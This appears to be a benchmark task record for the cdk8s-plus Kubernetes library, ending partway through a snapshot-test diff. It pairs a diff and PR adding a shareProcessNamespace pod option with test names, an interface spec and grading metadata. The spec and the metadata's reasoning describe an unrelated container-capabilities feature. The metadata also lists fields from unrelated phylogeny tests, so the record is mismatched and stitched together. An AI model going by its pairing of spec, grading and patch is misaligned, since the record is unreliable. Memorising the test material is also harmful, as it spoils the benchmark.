NO_EXECUTE taint queries can specify eviction", "can be co-located with a managed pod - default", "can be co-located with a managed pod - custom", "can be co-located with an unmanaged pod - default", "can be co-located with an unmanaged pod - custom", "can be separated from a managed pod - default", "can be separated from a managed pod - custom", "can be separated from an unmanaged pod - default", "can be separated from an unmanaged pod - custom", "can allow to ip block", "can isolate pod", "can allow to managed pod", "can allow to managed workload resource", "can allow to pods selected without namespaces", "can allow to pods selected with namespaces selected by names", "cannot allow to pods selected with namespaces selected by labels", "cannot allow to pods selected in all namespaces", "can allow to all pods", "can allow to managed namespace", "can allow to namespaces selected by name", "cannot allow to namespaces selected by labels", "can allow to peer across namespaces", "can allow to multiple peers", "cannot allow to the same peer twice", "allow to create an ingress policy in source namespace when peer doesnt define namespaces", "allow to with peer isolation creates only ingress policy on peer", "allow to with pod isolation creates only egress policy on pod", "allow to defaults to peer container ports", "can allow from ip block", "can allow from managed pod", "can allow from managed workload resource", "can allow from pods selected without namespaces", "can allow from pods selected with namespaces selected by names", "cannot allow from pods selected with namespaces selected by labels", "cannot allow from pods selected in all namespaces", "can allow from all pods", "can allow from managed namespace", "can allow from namespaces selected by name", "cannot allow from namespaces selected by labels", "can allow from peer across namespaces", "can allow from multiple peers", "cannot allow from the same peer twice", "allow from create an ingress policy in source namespace when peer doesnt define namespaces", "allow from with peer isolation creates only ingress policy on peer", "allow from with pod isolation creates only egress policy on pod", "allow from defaults to peer container ports", "can grant read permissions to a user", "can grant read permissions to a group", "can grant read permissions to a service account", "can grant read permissions to another pod", "can grant read permissions to workload", "can grant read permissions twice with different subjects", "cannot grant permissions twice with same subject", "targets a deployment that has containers with volume mounts", "creates HPA with 2 default scaleUp policies and 1 default scaleDown policy, when all other scaleUp and scaleDown options are provided", "creates HPA with scaleUp and scaleDown policies with the default 15 second periodSeconds, when policies are provided without duration option", "creates HPA with two different scaling strategies, when provided a scaleUp strategy of Max and scaleDown strategy of Min", "creates HPA with CPU ContainerResource metric, when provided a Metric.containerCpu()", "creates HPA with Memory ContainerResource metric, when provided a Metric.containerMemory()", "creates HPA with Storage ContainerResource metric, when provided a Metric.containerStorage()", "creates HPA with Ephemeral Storage ContainerResource metric, when provided a Metric.containerStorage()", "creates HPA with external metric, when provided a Metric.external()", "creates HPA with object metric, when provided a Metric.object()", "creates HPA with pods metric, when provided a Metric.pods()", "creates HPA with Resource CPU metric, when provided a Metric.resourceCpu()", "creates HPA with Resource Memory metric, when provided a Metric.resourceMemory()", "creates HPA with Resource Storage metric, when provided a Metric.resourceStorage()", "creates HPA with Resource Ephemeral Storage metric, when provided a Metric.resourceEphemeralStorage()", "creates HPA with Resource CPU metric targeting 70% average utilization, when provided a MetricTarget.averageUtilization()", "creates HPA with Resource CPU metric targeting 47.2 average value, when provided a MetricTarget.averageUtilization()", "creates HPA with Resource CPU metric targeting the exact value of 29.5, when provided a MetricTarget.value()", "creates HPA, when target is a deployment", "creates HPA, when target is a StatefulSet", "creates HPA, when minReplicas is same as maxReplicas", "creates HPA with expected spec, when metrics, scaleUp, and scaleDown are all configured", "creates HPA, when metrics are not provided and one of the two target containers does not have any resources limits/requests", "throws error at synth, when metrics are not provided and target container does not have resource constraints specified", "throws error, when minReplicas is more than maxReplicas", "throws error, when scaleUp.stabilizationWindow is more than 1 hour", "throws error, when scaleDown.stabilizationWindow is more than 1 hour", "throws error, when scaleUp.stabilizationWindow is -1", "throws error, when scaleDown.stabilizationWindow is -1 seconds", "throws error, when scaleUp policy has a duration longer than 30 minutes", "throws error, when scaleDown policy has a duration longer than 30 minutes", "throws error, when scaleUp policy has a duration set to 0", "throws error, when scaleDown policy has a duration set to 0", "throws error, when scaleUp policy has a duration set to -10 minutes", "throws error, when scaleDown policy has a duration set to -10 minutes", "throws error at synth, when Deployment target has replicas defined", "throws error at synth, when StatefulSet target has replicas defined", "Must be configured with at least one port", "Can provide cluster IP", "can select a deployment", "Can serve by port", "Must set externalIPs if provided", "Must be configured with externalName if type is EXTERNAL_NAME", "Type defaults to EXTERNAL_NAME if externalName if given", "Can restrict CIDR IP addresses for a LoadBalancer type", "can be exposed by an ingress" ]
Enum: Capability Location: src/container.ts Inputs: None (enum values are constants) Outputs: String values representing Linux POSIX capabilities, e.g., `CAP_AUDIT_CONTROL`, `CAP_BPF`, etc. Description: Enumeration of all supported POSIX capabilities that can be added to or dropped from a container's security context. Interface: ContainerSecutiryContextCapabilities Location: src/container.ts Inputs: - `add?`: optional array of `Capability` enums to add to the container. - `drop?`: optional array of `Capability` enums to remove from the container. Outputs: None (used as a data structure) Description: Defines the shape of the `capabilities` property in a `ContainerSecurityContext`, allowing callers to specify which capabilities to add or drop. Property: ContainerSecurityContext.capabilities Location: src/container.ts (class `ContainerSecurityContext`) Inputs: Optional `ContainerSecutiryContextCapabilities` object supplied via `ContainerSecurityContextProps.capabilities`. Outputs: The stored `ContainerSecutiryContextCapabilities` instance (or `undefined` if not set); accessible via `container.securityContext.capabilities`. Description: Exposes the POSIX capabilities configuration for a container's security context, enabling tests to verify added or dropped capabilities.
Apache-2.0
{ "base_image_name": "node_16", "install": [ "npm install" ], "log_parser": "parse_log_js_4", "test_cmd": "npx jest --verbose --no-colors --testLocationInResults" }
{ "num_modified_files": 1, "num_modified_lines": 196, "pr_author": "iliapolo", "pr_labels": [ "auto-approve: Pull requests that should be auto approved" ], "llm_metadata": { "code": "A", "code_quality": null, "confidence": 0.88, "detected_issues": { "B1": false, "B2": false, "B3": false, "B4": false, "B5": false, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "medium", "external_urls": [ "https://github.com/cdk8s-team/cdk8s-plus/pull/3817", "https://github.com/sqren/backport" ], "intent_completeness": "partial", "patch": null, "pr_categories": [ "core_feat" ], "reason": null, "reasoning": "The issue requests adding POSIX capabilities to a container's security context, and the test patch checks that the enum and properties are exported and serialized correctly. The provided tests align with the intended behavior (importing Capability, setting add/drop lists, and asserting their values), and no unrelated test failures are introduced. There are no signals of B‑category problems such as coupling, implicit naming, missing external info, ambiguous specs beyond the brief description, extra patch artifacts, or hidden domain knowledge. Hence the task is solvable and classified as high‑quality (A).", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, "test_core_sequence_test_sample_motif_length_3": null, "test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
9e268a1b70d50d7f264041a62ec838bb649f5599
2025-02-25 06:53:45
cdk8s-team__cdk8s-plus-5353
diff --git a/src/pod.ts b/src/pod.ts index 3ac602bc..14e4dfd2 100644 --- a/src/pod.ts +++ b/src/pod.ts @@ -19,6 +19,7 @@ export abstract class AbstractPod extends base.Resource implements IPodSelector, public readonly dns: PodDns; public readonly dockerRegistryAuth?: secret.ISecret; public readonly automountServiceAccountToken: boolean; + public readonly shareProcessNamespace: boolean; public readonly hostNetwork?: boolean; public readonly terminationGracePeriod?: Duration; @@ -40,6 +41,7 @@ export abstract class AbstractPod extends base.Resource implements IPodSelector, this.dns = new PodDns(props.dns); this.dockerRegistryAuth = props.dockerRegistryAuth; this.automountServiceAccountToken = props.automountServiceAccountToken ?? false; + this.shareProcessNamespace = props.shareProcessNamespace ?? false; this.isolate = props.isolate ?? false; this.hostNetwork = props.hostNetwork ?? false; this.terminationGracePeriod = props.terminationGracePeriod ?? Duration.seconds(30); @@ -249,6 +251,7 @@ export abstract class AbstractPod extends base.Resource implements IPodSelector, setHostnameAsFqdn: dns.hostnameAsFQDN, imagePullSecrets: this.dockerRegistryAuth ? [{ name: this.dockerRegistryAuth.name }] : undefined, automountServiceAccountToken: this.automountServiceAccountToken, + shareProcessNamespace: this.shareProcessNamespace, hostNetwork: this.hostNetwork, terminationGracePeriodSeconds: this.terminationGracePeriod?.toSeconds(), }; @@ -437,6 +440,14 @@ export interface AbstractPodProps extends base.ResourceProps { */ readonly automountServiceAccountToken?: boolean; + /** + * When process namespace sharing is enabled, processes in a container are visible to all other containers in the same pod. + * + * @default false + * @see https://kubernetes.io/docs/tasks/configure-pod-container/share-process-namespace/ + */ + readonly shareProcessNamespace?: boolean; + /** * Isolates the pod. This will prevent any ingress or egress connections to / from this pod. * You can however allow explicit connections post instantiation by using the `.connections` property.
feat(pod): shareProcessNamespace (backport #4902) # Backport This will backport the following commits from `k8s-31/main` to `k8s-29/main`: - [feat(pod): shareProcessNamespace (#4902)](https://github.com/cdk8s-team/cdk8s-plus/pull/4902) <!--- Backport version: 9.5.1 --> ### Questions ? Please refer to the [Backport tool documentation](https://github.com/sorenlouv/backport)
**Title** Add optional process‑namespace sharing to Pod constructs **Problem** The library does not expose Kubernetes’ `shareProcessNamespace` flag, preventing users from configuring pods so that containers share a single process namespace. **Root Cause** The Pod abstraction lacked a corresponding property and did not propagate the setting to the generated pod spec. **Fix / Expected Behavior** - Introduce an optional boolean flag on the pod configuration to enable process‑namespace sharing. - Default the flag to `false` to keep existing pods unchanged. - Include the flag in the rendered pod manifest under the correct field when enabled. - Update the public API documentation to describe the new option and reference Kubernetes guidance. **Risk & Validation** - Verify that the default `false` preserves backward compatibility for all existing deployments. - Add tests to confirm that the manifest contains `shareProcessNamespace: true` only when the flag is set. - Run the full test suite to ensure no regression in pod creation or other resource handling.
5,353
cdk8s-team/cdk8s-plus
diff --git a/test/__snapshots__/container.test.ts.snap b/test/__snapshots__/container.test.ts.snap index c94d5044..ee03dfa1 100644 --- a/test/__snapshots__/container.test.ts.snap +++ b/test/__snapshots__/container.test.ts.snap @@ -68,6 +68,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -129,6 +130,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -179,6 +181,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -250,6 +253,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -306,6 +310,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, "volumes": Array [ Object { diff --git a/test/__snapshots__/cron-job.test.ts.snap b/test/__snapshots__/cron-job.test.ts.snap index e8f2501a..309c040f 100644 --- a/test/__snapshots__/cron-job.test.ts.snap +++ b/test/__snapshots__/cron-job.test.ts.snap @@ -52,6 +52,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -138,6 +139,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -205,6 +207,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, diff --git a/test/__snapshots__/daemon-set.test.ts.snap b/test/__snapshots__/daemon-set.test.ts.snap index 3b07d8a5..3ab34b83 100644 --- a/test/__snapshots__/daemon-set.test.ts.snap +++ b/test/__snapshots__/daemon-set.test.ts.snap @@ -54,6 +54,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -134,6 +135,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -196,6 +198,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, diff --git a/test/__snapshots__/deployment.test.ts.snap b/test/__snapshots__/deployment.test.ts.snap index 4a656e0c..8979adee 100644 --- a/test/__snapshots__/deployment.test.ts.snap +++ b/test/__snapshots__/deployment.test.ts.snap @@ -74,6 +74,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -194,6 +195,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -293,6 +295,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -402,6 +405,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -495,6 +499,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -586,6 +591,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -676,6 +682,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -747,6 +754,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -830,6 +838,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -901,6 +910,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -981,6 +991,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1074,6 +1085,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1164,6 +1176,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1235,6 +1248,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1318,6 +1332,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1389,6 +1404,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1469,6 +1485,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1562,6 +1579,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1652,6 +1670,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1740,6 +1759,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1825,6 +1845,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1877,6 +1898,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, "tolerations": Array [ Object { @@ -2000,6 +2022,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, diff --git a/test/__snapshots__/horizontal-pod-autoscaler.test.ts.snap b/test/__snapshots__/horizontal-pod-autoscaler.test.ts.snap index c4a24c10..5381f2a1 100644 --- a/test/__snapshots__/horizontal-pod-autoscaler.test.ts.snap +++ b/test/__snapshots__/horizontal-pod-autoscaler.test.ts.snap @@ -62,6 +62,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -177,6 +178,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -305,6 +307,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -433,6 +436,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -561,6 +565,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -688,6 +693,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -815,6 +821,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -942,6 +949,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1069,6 +1077,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1196,6 +1205,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1323,6 +1333,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1450,6 +1461,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1578,6 +1590,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1710,6 +1723,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1844,6 +1858,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -2012,6 +2027,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -2146,6 +2162,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -2266,6 +2283,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -2394,6 +2412,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -2509,6 +2528,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -2633,6 +2653,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -2754,6 +2775,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -2869,6 +2891,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -2990,6 +3013,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, "volumes": Array [ Object { diff --git a/test/__snapshots__/job.test.ts.snap b/test/__snapshots__/job.test.ts.snap index 5aca1007..106074f8 100644 --- a/test/__snapshots__/job.test.ts.snap +++ b/test/__snapshots__/job.test.ts.snap @@ -48,6 +48,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, diff --git a/test/__snapshots__/network-policy.test.ts.snap b/test/__snapshots__/network-policy.test.ts.snap index 514e47f9..470cf8bd 100644 --- a/test/__snapshots__/network-policy.test.ts.snap +++ b/test/__snapshots__/network-policy.test.ts.snap @@ -136,6 +136,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -181,6 +182,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -267,6 +269,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -331,6 +334,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -419,6 +423,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -502,6 +507,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -584,6 +590,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -671,6 +678,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -766,6 +774,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -857,6 +866,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -962,6 +972,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1048,6 +1059,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1135,6 +1147,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1180,6 +1193,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1266,6 +1280,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1330,6 +1345,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1418,6 +1434,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1501,6 +1518,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1583,6 +1601,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1670,6 +1689,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1765,6 +1785,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1856,6 +1877,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1961,6 +1983,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -2047,6 +2070,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -2134,6 +2158,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -2217,6 +2242,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, diff --git a/test/__snapshots__/pod.test.ts.snap b/test/__snapshots__/pod.test.ts.snap index 137d7e68..3b173625 100644 --- a/test/__snapshots__/pod.test.ts.snap +++ b/test/__snapshots__/pod.test.ts.snap @@ -44,6 +44,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -99,6 +100,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -173,6 +175,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -291,6 +294,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -341,6 +345,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -417,6 +422,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -467,6 +473,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -543,6 +550,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -593,6 +601,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -721,6 +730,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -771,6 +781,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -847,6 +858,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -897,6 +909,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -973,6 +986,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1023,6 +1037,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1127,6 +1142,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1206,6 +1222,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1324,6 +1341,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1431,6 +1449,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1481,6 +1500,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + 